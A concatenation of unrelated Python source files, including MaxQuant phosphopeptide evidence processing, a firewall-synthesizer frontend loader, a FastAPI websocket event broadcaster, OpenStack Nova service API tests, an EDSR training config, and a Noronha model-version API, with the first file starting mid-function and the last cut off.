ev.loc[m, 'Protein phospho sites'] = all_protein_phospho_sites
def _add_stp_motif(ev, proteindb):
m = (ev['Phospho (STY)'] > 0) & (ev['Reverse'] != '+')
stp_annotation = []
for prot, sites in zip(
ev[m]['Leading Razor Protein'],
ev[m]['Phospho positions']
):
annotation = []
for site in map(int, sites.split(',')):
motif = proteindb.proteins[prot].sequence[site - 1:site + 1]
try:
if motif in ['SP', 'TP']:
annotation.append(motif)
else:
annotation.append('-')
except IndexError:
annotation.append('-')
stp_annotation.append(' / '.join(annotation))
ev['S/T-P motif'] = ''
ev.loc[m, 'S/T-P motif'] = stp_annotation
def _change_mod_sequence(ev):
func = lambda s: s.split('_')[1].replace('(', '[').replace(')', ']')
ev['Modified sequence'] = ev['Modified sequence'].apply(func)
def _add_proline_count(ev):
proline_count = [sequence.count('P') for sequence in ev['Sequence']]
ev['P Count'] = proline_count
def _add_protein_names(ev, proteindb):
m = (ev['Reverse'] != '+')
protein_names = []
for protein in ev['Leading Razor Protein'][m]:
protein_names.append(proteindb[protein].name)
ev['Protein Systematic Name'] = ev['Leading Razor Protein'].tolist()
ev['Protein Standard Name'] = ev['Leading Razor Protein'].tolist()
ev.loc[m, 'Protein Standard Name'] = protein_names
def _add_peptide_positions(ev, proteindb):
m = (ev['Reverse'] != '+')
start_positions = []
end_positions = []
for prot, seq in zip(ev['Leading Razor Protein'][m], ev['Sequence'][m]):
start, end = proteindb.peptides[seq].proteinPositions[prot]
start_positions.append(start)
end_positions.append(end)
ev['Sequence start'] = ''
ev.loc[m, 'Sequence start'] = start_positions
ev['Sequence end'] = ''
ev.loc[m, 'Sequence end'] = end_positions
def _add_contamination(ev, contamination_tag):
contamination = []
for protein in ev['Leading Razor Protein']:
if protein.find(contamination_tag) != -1:
contamination.append('+')
else:
contamination.append('')
ev['Potential contaminant'] = contamination
def _add_decoy(ev, decoy_tag):
decoy = []
for protein in ev['Leading Razor Protein']:
if protein.find(decoy_tag) != -1:
decoy.append('+')
else:
decoy.append('')
ev['Reverse'] = decoy
def _add_valid_quant(ev):
""" True if quantified and neiter a contaminant or a decoy protein. """
valid_quantification = np.all([
np.isfinite(ev['Ratio H/L']),
ev['Potential contaminant'] != '+',
ev['Reverse'] != '+',
], axis=0)
ev['Valid Quantification'] = valid_quantification
def _add_combined_probability(ev):
ev['Combined Phospho Probability'] = np.nan
m = (ev['Phospho (STY)'] != 0) & (ev['Type'] != 'MULTI-MATCH')
combined_probabilities = []
for prob, num in zip(
ev['Phospho (STY) Probabilities'][m],
ev['Phospho (STY)'][m]
):
combined_probability = _combined_localization_probability(prob, num)
combined_probabilities.append(combined_probability)
ev.loc[m, 'Combined Phospho Probability'] = combined_probabilities
def _combined_localization_probability(entry, num):
probabilities = _extract_phospho_probabilities(entry)
combined_probability = 1
for probability, site in probabilities[:num]:
combined_probability = combined_probability * probability
return combined_probability
def _extract_phospho_probabilities(entry):
"""
:params entry: entry of the field "Phospho (STY) Probabilities" from a
maxquant evidence.txt file. For exaample: "AAADAIS(1)DIEIK"
:returns: a sorted list (best probabilities first) of tuples, containing a
probability value and the phospho position (starting from 1).
For example: [(1.0, 7)]
"""
probabilities = list()
while entry.find('(') != -1:
mod_position = int(entry.find('('))
mod_probability = float(entry.split('(')[1].split(')')[0])
probabilities.append((mod_probability, mod_position))
entry = entry.split('(', 1)[0] + entry.split(')', 1)[1]
return sorted(probabilities, reverse=True)
def _add_log_ratio(ev):
m = ev['Valid Quantification']
ev['Ratio Log2'] = np.nan
ev.loc[m, 'Ratio Log2'] = np.log2(ev['Ratio H/L'][m])
def _normalize_ratios(ev):
groups = []
normalization_data = {}
for exp, group in ev.groupby('Experiment'):
norm_data = _calc_normalization(group)
normalization_data[exp] = norm_data
m = group['Valid Quantification']
corr = (group['P Count'][m] * norm_data['p_shift']) + norm_data['shift']
group['Ratio Log2 normalized'] = np.nan
group['Ratio Log2 normalized'][m] = group['Ratio Log2'][m] - corr
groups.append(group)
return pd.concat(groups), normalization_data
def _calc_normalization(ev):
p_masks = []
for pcount in range(3):
p_mask = np.all([
ev['Valid Quantification'],
ev['Phospho (STY)'] == 0,
ev['P Count'] == pcount,
], axis=0)
p_masks.append(p_mask)
median_P0 = np.median(np.median(ev['Ratio Log2'][p_masks[0]]))
median_P1 = np.median(np.median(ev['Ratio Log2'][p_masks[1]]))
median_P2 = np.median(np.median(ev['Ratio Log2'][p_masks[2]]))
weighted_p1 = (median_P1 - median_P0) / 1 * p_masks[1].sum()
weighted_p2 = (median_P2 - median_P0) / 2 * p_masks[2].sum()
total_num = p_masks[1].sum() + p_masks[2].sum()
proline_shift = (weighted_p1 + weighted_p2) / total_num
ratio_shift = median_P0
norm_data = {'shift': ratio_shift, 'p_shift': proline_shift}
return norm_data
def _adjust_mq_version_headers(ev):
""" Unify evidence table headers of different MQ versions. """
ev.rename(columns={
'Leading razor protein': 'Leading Razor Protein',
'Leading proteins': 'Leading Proteins'
}, inplace=True)
|
#!/usr/bin/env python2
import os
import pkgutil
import importlib
import fwsynthesizer
from fwsynthesizer.utils import *
FRONTENDS = [ x[1] for x in pkgutil.iter_modules(__path__) ]
class Frontend:
"Frontend object"
def __init__(self, name, diagram, language_converter,
query_configuration=None, interfaces_enabled=True):
"""
Make a Frontend object
Args:
name (str): frontend name
diagram (str): diagram file path
language_converter (Callable[[str,dict], str]): converter callable
query_configuration (callable): query configuration loop
interfaces_enabled (bool): do or do not consider the interfaces
"""
self.name = name
self.diagram = diagram
self.language_converter = language_converter
self.query_configuration = query_configuration
self.interfaces_enabled = interfaces_enabled
def import_frontend(name):
"""
Import a frontend from the frontend package.
Note: each frontend is a python script that must contain a `frontend` variable
with the definition of the Frontend object
"""
if name in FRONTENDS:
frontend = importlib.import_module('.'+name, package="fwsynthesizer.frontends").frontend
frontend.diagram = os.path.join(os.path.dirname(fwsynthesizer.__file__), frontend.diagram)
return frontend
elif os.path.exists(name) and os.path.isfile(name):
return Frontend(name="Generic",
diagram=os.path.abspath(name),
language_converter=lambda x,_: x,
interfaces_enabled=False)
else:
raise RuntimeError("Invalid Frontend '{}'!".format(name))
class LanguageConverter:
"Callable object that converts a configuration file to the generic language"
def __init__(self, parser, converter):
self.parser = parser
self.converter = converter
def __call__(self, contents, interfaces):
contents = preprocess(contents)
ast = self.parser(contents)
rules = self.converter(ast, interfaces)
return rules
def converter(parser, converter):
"Make a LanguageConverter object"
return LanguageConverter(parser, converter)
def query_configuration(get_lines, delete_rule):
"Query a configuration and show all the rules that affect the selected packets"
def query_loop(name, diagram, contents, interfaces, query,
languageconverter):
contents = preprocess(contents)
local_addresses = get_local_addresses(interfaces)
lines = get_lines(contents)
rules = languageconverter.parser(contents)
rules_contents = languageconverter.converter(rules, interfaces)
firewall = fwsynthesizer.Firewall(name, diagram, rules_contents, local_addresses)
for i in range(0, len(lines)):
rules1 = delete_rule(rules, i)
rules_contents1 = languageconverter.converter(rules1, interfaces)
test = fwsynthesizer.Firewall("{}_{}".format(name, i), diagram,rules_contents1, local_addresses)
res = firewall.equivalence(test, query=query)
if not res: print lines[i]
return query_loop
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from .gpr import GPR, LRAGPR
__all__ = [
'GPR', 'LRAGPR'
]
|
import asyncio
from typing import Any, Union
from pydantic.main import BaseModel
from .event_notifier import EventNotifier, Subscription, TopicList, ALL_TOPICS
from broadcaster import Broadcast
from .logger import get_logger
from fastapi_websocket_rpc.utils import gen_uid
logger = get_logger('EventBroadcaster')
# Cross service broadcast consts
NotifierId = str
class BroadcastNotification(BaseModel):
notifier_id: NotifierId
topics: TopicList
data: Any
class EventBroadcasterException(Exception):
pass
class BroadcasterAlreadyStarted(EventBroadcasterException):
pass
class EventBroadcasterContextManager:
"""
Manages the context for the EventBroadcaster
Friend-like class of EventBroadcaster (accessing "protected" members )
"""
def __init__(self, event_broadcaster: "EventBroadcaster", listen: bool = True, share: bool = True) -> None:
"""
Provide a context manager for an EventBroadcaster, managing if it listens to events coming from the broadcaster
and if it subscribes to the internal notifier to share its events with the broadcaster
Args:
event_broadcaster (EventBroadcaster): the broadcaster we manage the context for.
share (bool, optional): Should we share events with the broadcaster. Defaults to True.
listen (bool, optional): Should we listen for incoming events from the broadcaster. Defaults to True.
"""
self._event_broadcaster = event_broadcaster
self._share: bool = share
self._listen: bool = listen
self._lock = asyncio.Lock()
async def __aenter__(self):
async with self._lock:
if self._listen:
self._event_broadcaster._listen_count += 1
if self._event_broadcaster._listen_count == 1:
# We have our first listener start the read-task for it (And all those who'd follow)
logger.info("Listening for incoming events from broadcast channel (first listener started)")
# Start task listening on incoming broadcasts
self._event_broadcaster.start_reader_task()
if self._share:
self._event_broadcaster._share_count += 1
if self._event_broadcaster._share_count == 1:
# We have our first publisher
# Init the broadcast used for sharing (reading has its own)
self._event_broadcaster._acquire_sharing_broadcast_channel()
logger.debug("Subscribing to ALL_TOPICS, and sharing messages with broadcast channel")
# Subscribe to internal events form our own event notifier and broadcast them
await self._event_broadcaster._subscribe_to_all_topics()
else:
logger.debug(f"Did not subscribe to ALL_TOPICS: share count == {self._event_broadcaster._share_count}")
return self
async def __aexit__(self, exc_type, exc, tb):
async with self._lock:
try:
if self._listen:
self._event_broadcaster._listen_count -= 1
# if this was last listener - we can stop the reading task
if self._event_broadcaster._listen_count == 0:
# Cancel task reading broadcast subscriptions
if self._event_broadcaster._subscription_task is not None:
logger.info("Cancelling broadcast listen task")
self._event_broadcaster._subscription_task.cancel()
self._event_broadcaster._subscription_task = None
if self._share:
self._event_broadcaster._share_count -= 1
# if this was last sharer - we can stop subscribing to internal events - we aren't sharing anymore
if self._event_broadcaster._share_count == 0:
# Unsubscribe from internal events
logger.debug("Unsubscribing from ALL TOPICS")
await self._event_broadcaster._unsubscribe_from_topics()
except:
logger.exception("Failed to exit EventBroadcaster context")
class EventBroadcaster:
"""
Bridge EventNotifier to work across processes and machines by sharing their events through a broadcasting channel
Usage:
uri = "postgres://localhost:5432/db_name" #postgres example (also supports REDIS, Kafka, ...)
# start litsening for broadcast publications notifying the internal event-notifier, and subscribing to the internal notifier, broadcasting its notes
broadcaster = EventBroadcaster(uri, notifier):
async with broadcaster.get_context():
<Your Code>
"""
def __init__(self, broadcast_url: str, notifier: EventNotifier, channel="EventNotifier",
broadcast_type=None, is_publish_only=False) -> None:
"""
Args:
broadcast_url (str): the URL of the broadcasting service
notifier (EventNotifier): the event notifier managing our internal events - which will be bridge via the broadcaster
channel (str, optional): Channel name. Defaults to "EventNotifier".
broadcast_type (Broadcast, optional): Broadcast class to use. None - Defaults to Broadcast.
is_publish_only (bool, optional): [For default context] Should the broadcaster only transmit events and not listen to any. Defaults to False
"""
# Broadcast init params
self._broadcast_url = broadcast_url
self._broadcast_type = broadcast_type or Broadcast
# Publish broadcast (initialized within async with statement)
self._sharing_broadcast_channel = None
# channel to operate on
self._channel = channel
# Async-io task for reading broadcasts (initialized within async with statement)
self._subscription_task = None
# Uniqueue instance id (used to avoid reading own notifications sent in broadcast)
self._id = gen_uid()
# The internal events notifier
self._notifier = notifier
self._is_publish_only = is_publish_only
self._publish_lock = None
# used to track creation / removal of resources needed per type (reader task->listen, and subscription to internal events->share)
self._listen_count: int = 0
self._share_count: int = 0
# If we opt to manage the context directly (i.e. call async with on the event broadcaster itself)
self._context_manager = None
async def __broadcast_notifications__(self, subscription: Subscription, data):
"""
Share incoming internal notifications with the entire broadcast channel
Args:
subscription (Subscription): the subscription that got triggered
data: the event data
"""
logger.info("Broadcasting incoming event: {}".format({'topic': subscription.topic, 'notifier_id': self._id}))
note = BroadcastNotification(notifier_id=self._id, topics=[
subscription.topic], data=data)
# Publish event to broadcast
async with self._publish_lock:
async with self._sharing_broadcast_channel:
await self._sharing_broadcast_channel.publish(self._channel, note.json())
def _acquire_sharing_broadcast_channel(self):
"""
Initialize the elements needed for sharing events with the broadcast channel
"""
self._publish_lock = asyncio.Lock()
self._sharing_broadcast_channel = self._broadcast_type(self._broadcast_url)
async def _subscribe_to_all_topics(self):
return await self._notifier.subscribe(self._id,
ALL_TOPICS,
self.__broadcast_notifications__)
async def _unsubscribe_from_topics(self):
return await self._notifier.unsubscribe(self._id)
def get_context(self, listen=True, share=True):
"""
Create a new context manager you can call 'async with' on, configuring the broadcaster for listening, sharing, or both.
Args:
listen (bool, optional): Should we listen for events incoming from the broadcast channel. Defaults to True.
share (bool, optional): Should we share events with the broadcast channel. Defaults to True.
Returns:
EventBroadcasterContextManager: the context
"""
return EventBroadcasterContextManager(self, listen=listen, share=share)
def get_listening_context(self):
return EventBroadcasterContextManager(self, listen=True, share=False)
def get_sharing_context(self):
return EventBroadcasterContextManager(self, listen=False, share=True)
async def __aenter__(self):
"""
Convince caller (also backward compaltability)
"""
if self._context_manager is None:
self._context_manager = self.get_context(listen=not self._is_publish_only)
return await self._context_manager.__aenter__()
async def __aexit__(self, exc_type, exc, tb):
await self._context_manager.__aexit__(exc_type, exc, tb)
def start_reader_task(self):
"""Spawn a task reading incoming broadcasts and posting them to the intreal notifier
Raises:
BroadcasterAlreadyStarted: if called more than once per context
Returns:
the spawned task
"""
# Make sure a task wasn't started already
if self._subscription_task is not None:
# we already started a task for this worker process
logger.debug("No need for listen task, already started broadcast listen task for this notifier")
return
# Trigger the task
logger.debug("Spawning broadcast listen task")
self._subscription_task = asyncio.create_task(
self.__read_notifications__())
return self._subscription_task
async def __read_notifications__(self):
"""
read incoming broadcasts and posting them to the intreal notifier
"""
logger.info("Starting broadcaster listener")
# Init new broadcast channel for reading
listening_broadcast_channel = self._broadcast_type(self._broadcast_url)
async with listening_broadcast_channel:
# Subscribe to our channel
async with listening_broadcast_channel.subscribe(channel=self._channel) as subscriber:
async for event in subscriber:
try:
notification = BroadcastNotification.parse_raw(
event.message)
# Avoid re-publishing our own broadcasts
if notification.notifier_id != self._id:
logger.info("Handling incoming broadcast event: {}".format({'topics': notification.topics, 'src': notification.notifier_id}))
# Notify subscribers of message received from broadcast
await self._notifier.notify(notification.topics, notification.data, notifier_id=self._id)
except:
logger.exception("Failed handling incoming broadcast")
|
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import calendar
import datetime
import webob.exc
from nova.api.openstack.compute.contrib import services
from nova.api.openstack import extensions
from nova import availability_zones
from nova import context
from nova import db
from nova import exception
from nova.openstack.common import timeutils
from nova.servicegroup.drivers import db as db_driver
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests.objects import test_service
fake_services_list = [
dict(test_service.fake_service,
binary='nova-scheduler',
host='host1',
id=1,
disabled=True,
topic='scheduler',
updated_at=datetime.datetime(2012, 10, 29, 13, 42, 2),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 27),
disabled_reason='test1'),
dict(test_service.fake_service,
binary='nova-compute',
host='host1',
id=2,
disabled=True,
topic='compute',
updated_at=datetime.datetime(2012, 10, 29, 13, 42, 5),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 27),
disabled_reason='test2'),
dict(test_service.fake_service,
binary='nova-scheduler',
host='host2',
id=3,
disabled=False,
topic='scheduler',
updated_at=datetime.datetime(2012, 9, 19, 6, 55, 34),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 28),
disabled_reason=''),
dict(test_service.fake_service,
binary='nova-compute',
host='host2',
id=4,
disabled=True,
topic='compute',
updated_at=datetime.datetime(2012, 9, 18, 8, 3, 38),
created_at=datetime.datetime(2012, 9, 18, 2, 46, 28),
disabled_reason='test4'),
]
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
GET = {}
class FakeRequestWithService(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"binary": "nova-compute"}
class FakeRequestWithHost(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"host": "host1"}
class FakeRequestWithHostService(object):
environ = {"nova.context": context.get_admin_context()}
GET = {"host": "host1", "binary": "nova-compute"}
def fake_host_api_service_get_all(context, filters=None, set_zones=False):
if set_zones or 'availability_zone' in filters:
return availability_zones.set_availability_zones(context,
fake_services_list)
def fake_db_api_service_get_all(context, disabled=None):
return fake_services_list
def fake_service_get_by_host_binary(context, host, binary):
for service in fake_services_list:
if service['host'] == host and service['binary'] == binary:
return service
return None
def fake_service_get_by_id(value):
for service in fake_services_list:
if service['id'] == value:
return service
return None
def fake_service_update(context, service_id, values):
service = fake_service_get_by_id(service_id)
if service is None:
raise exception.ServiceNotFound(service_id=service_id)
return service
def fake_utcnow():
return datetime.datetime(2012, 10, 29, 13, 42, 11)
def fake_utcnow_ts():
d = fake_utcnow()
return calendar.timegm(d.utctimetuple())
class ServicesTest(test.TestCase):
def setUp(self):
super(ServicesTest, self).setUp()
self.context = context.get_admin_context()
self.ext_mgr = extensions.ExtensionManager()
self.ext_mgr.extensions = {}
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
self.stubs.Set(timeutils, "utcnow", fake_utcnow)
self.stubs.Set(timeutils, "utcnow_ts", fake_utcnow_ts)
self.stubs.Set(db, "service_get_by_args",
fake_service_get_by_host_binary)
self.stubs.Set(db, "service_update", fake_service_update)
def test_services_list(self):
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2)},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'nova-scheduler',
'host': 'host2',
'zone': 'internal',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34)},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_host(self):
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2)},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_service(self):
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38)}]}
self.assertEqual(res_dict, response)
def test_services_list_with_host_service(self):
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5)}]}
self.assertEqual(res_dict, response)
def test_services_detail(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequest()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'nova-scheduler',
'host': 'host2',
'zone': 'internal',
'status': 'enabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 19, 6, 55, 34),
'disabled_reason': ''},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_host(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithHost()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-scheduler',
'host': 'host1',
'zone': 'internal',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 2),
'disabled_reason': 'test1'},
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'},
{'binary': 'nova-compute',
'host': 'host2',
'zone': 'nova',
'status': 'disabled',
'state': 'down',
'updated_at': datetime.datetime(2012, 9, 18, 8, 3, 38),
'disabled_reason': 'test4'}]}
self.assertEqual(res_dict, response)
def test_service_detail_with_host_service(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
self.stubs.Set(self.controller.host_api, "service_get_all",
fake_host_api_service_get_all)
req = FakeRequestWithHostService()
res_dict = self.controller.index(req)
response = {'services': [
{'binary': 'nova-compute',
'host': 'host1',
'zone': 'nova',
'status': 'disabled',
'state': 'up',
'updated_at': datetime.datetime(2012, 10, 29, 13, 42, 5),
'disabled_reason': 'test2'}]}
self.assertEqual(res_dict, response)
def test_services_enable(self):
def _service_update(context, service_id, values):
self.assertIsNone(values['disabled_reason'])
return dict(test_service.fake_service, **values)
self.stubs.Set(db, "service_update", _service_update)
body = {'host': 'host1', 'binary': 'nova-compute'}
req = fakes.HTTPRequest.blank('/v2/fake/os-services/enable')
res_dict = self.controller.update(req, "enable", body)
self.assertEqual(res_dict['service']['status'], 'enabled')
self.assertNotIn('disabled_reason', res_dict['service'])
# This test is just to verify that the servicegroup API gets used when
# calling this API.
def test_services_with_exception(self):
def dummy_is_up(self, dummy):
raise KeyError()
self.stubs.Set(db_driver.DbDriver, 'is_up', dummy_is_up)
req = FakeRequestWithHostService()
self.assertRaises(KeyError, self.controller.index, req)
def test_services_disable(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-services/disable')
body = {'host': 'host1', 'binary': 'nova-compute'}
res_dict = self.controller.update(req, "disable", body)
self.assertEqual(res_dict['service']['status'], 'disabled')
self.assertNotIn('disabled_reason', res_dict['service'])
def test_services_disable_log_reason(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = \
fakes.HTTPRequest.blank('v2/fakes/os-services/disable-log-reason')
body = {'host': 'host1',
'binary': 'nova-compute',
'disabled_reason': 'test-reason',
}
res_dict = self.controller.update(req, "disable-log-reason", body)
self.assertEqual(res_dict['service']['status'], 'disabled')
self.assertEqual(res_dict['service']['disabled_reason'], 'test-reason')
def test_mandatory_reason_field(self):
self.ext_mgr.extensions['os-extended-services'] = True
self.controller = services.ServiceController(self.ext_mgr)
req = \
fakes.HTTPRequest.blank('v2/fakes/os-services/disable-log-reason')
body = {'host': 'host1',
'binary': 'nova-compute',
}
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.update, req, "disable-log-reason", body)
def test_invalid_reason_field(self):
reason = ' '
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'a' * 256
self.assertFalse(self.controller._is_valid_as_reason(reason))
reason = 'it\'s a valid reason.'
self.assertTrue(self.controller._is_valid_as_reason(reason))
|
import argparse
import template
import os.path
import easydict
### See option.py for detailed information.
args = easydict.EasyDict({
'debug': False,
'template': '.',
'degradation': False,
# Hardware specifications
'n_threads': 0,
'cpu': False,
'n_GPUs': 1,
'seed': 1,
# Data specifications
'dir_data': '~/Datasets/',
'dir_demo': '../test',
'data_train': 'DIV2K',
'data_test': 'DIV2K',
'data_range': '1-800/801-810',
'ext': 'sep',
'scale': '4',
'patch_size': 192,
'rgb_range': 255,
'n_colors': 3,
'chop': False,
'ch_shuffle': False,
'lr_noise_sigma': 0.0,
'no_augment': False,
# Model specifications
'model' : 'EDSR',
'normalization': 'None',
'act': 'relu',
'pre_train': '',
'extend': '',
'n_depth': 2,
'n_resgroups': 4,
'n_resblocks': 16,
'n_feats': 64,
'res_scale': 1.0,
'shift_mean': True,
'dilation': False,
'precision': 'single',
# Training Speficiations
'reset': False,
'test_every': 1000,
'epochs': 300,
'batch_size': 16,
'split_batch': 1,
'self_ensemble': False,
'test_only': False,
'gan_k': 1,
'gan_arch': 'patch',
# Optimization specifications
'lr': 1e-4,
'decay': '200',
'gamma': 0.5,
'optimizer': 'ADAM',
'momentum': 0.9,
'betas': (0.9, 0.999),
'epsilon': 1e-8,
'weight_decay': 0,
'gclip': 0,
# Loss specifications
'loss': '1*L1',
'skip_threshold': 1e8,
# Log specifications
'save': 'test',
'load': '',
'resume': 0,
'save_models': False,
'print_every': 100,
'save_results': False,
'save_gt': False
})
|
# -*- coding: utf-8 -*-
# Copyright Noronha Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from noronha.api.main import NoronhaAPI
from noronha.bay.barrel import MoversBarrel
from noronha.common.annotations import validate
from noronha.common.errors import NhaAPIError
from noronha.common.logging import LOG
from noronha.db.ds import Dataset
from noronha.db.model import Model
from noronha.db.movers import ModelVersion
from noronha.db.train import Training
class ModelVersionAPI(NoronhaAPI):
doc = ModelVersion
valid = NoronhaAPI.valid
def info(self, name, model):
return super().info(name=name, model=model)
def rm(self, name, model):
mv = self.doc().find_one(name=name, model=model)
# TODO: check if movers is not being used in a depl right now
mv.delete()
return dict(
name=name,
model=model,
record='removed',
files='purged' if MoversBarrel(mv).purge(ignore=True) else 'not_found'
)
def lyst(self, _filter: dict = None, model: str = None, train: str = None, ds: str = None, **kwargs):
if model is not None:
kwargs['model'] = Model().find_one(name=model).name
_filter = _filter or {}
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot filter by training name if no working project is set")
else:
train = Training.find_one(name=train, proj=self.proj.name)
_filter['train.name'] = train.name
_filter['train.bvers.proj.name'] = train.bvers.proj.name
if ds is not None:
if model is None:
raise NhaAPIError("Cannot filter by dataset name if no model was specified")
else:
ds = Dataset.find_one(name=ds, model=model)
_filter['ds.name'] = ds.name
_filter['ds.model'] = ds.model.name
return super().lyst(_filter=_filter, **kwargs)
def _store(self, mv: ModelVersion, path: str = None):
barrel = MoversBarrel(mv)
if barrel.schema is None:
LOG.warn("Publishing model version '{}' without a strict file definition".format(mv.get_pk()))
barrel.store_from_path(path)
return barrel
@validate(name=valid.dns_safe_or_none, details=(dict, None))
def new(self, name: str = None, model: str = None, train: str = None, ds: str = None, path: str = None,
pretrained: str = None, skip_upload=False, lightweight=False, **kwargs):
if path is None:
raise NhaAPIError("Cannot publish model version if path to model files is not provided")
model = Model.find_one(name=model)
if lightweight:
model.assert_movers_can_be_lightweight()
if ds is not None:
kwargs['ds'] = Dataset.find_one(name=ds, model=model).to_embedded()
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot determine parent training if no working project is set")
else:
kwargs['train'] = Training.find_one(name=train, proj=self.proj.name).to_embedded()
if pretrained is not None:
kwargs['pretrained'] = ModelVersion.find_by_pk(pretrained).to_embedded()
LOG.info("Model version used pre-trained model '{}'".format(pretrained))
mv: ModelVersion = super().new(
name=name,
model=model,
lightweight=lightweight,
**kwargs,
_duplicate_filter=dict(name=name, model=model)
)
barrel = None
try:
if not skip_upload:
barrel = self._store(mv, path)
except Exception as e:
LOG.warn("Reverting creation of model version '{}'".format(mv.name))
mv.delete()
if barrel is not None:
barrel.purge(ignore=True)
raise e
return mv
@validate(details=(dict, None))
def update(self, name, model, train: str = None, ds: str = None, path: str = None, **kwargs):
if ds is not None:
kwargs['ds'] = Dataset().find_one(name=ds, model=model).to_embedded()
if train is not None:
if self.proj is None:
raise NhaAPIError("Cannot determine parent training if no working project is set")
else:
kwargs['train'] = Training().find_one(name=train, proj=self.proj.name).to_embedded()
mv = super().update(
filter_kwargs=dict(name=name, model=model),
update_kwargs=kwargs
)
if path is not None:
self._store(mv, path)
return mv
|
import unittest
import numpy as np
import numpy.testing as npt
import wisdem.towerse.tower_struct as tow
from wisdem.towerse import RIGID
class TestStruct(unittest.TestCase):
def setUp(self):
self.inputs = {}
self.outputs = {}
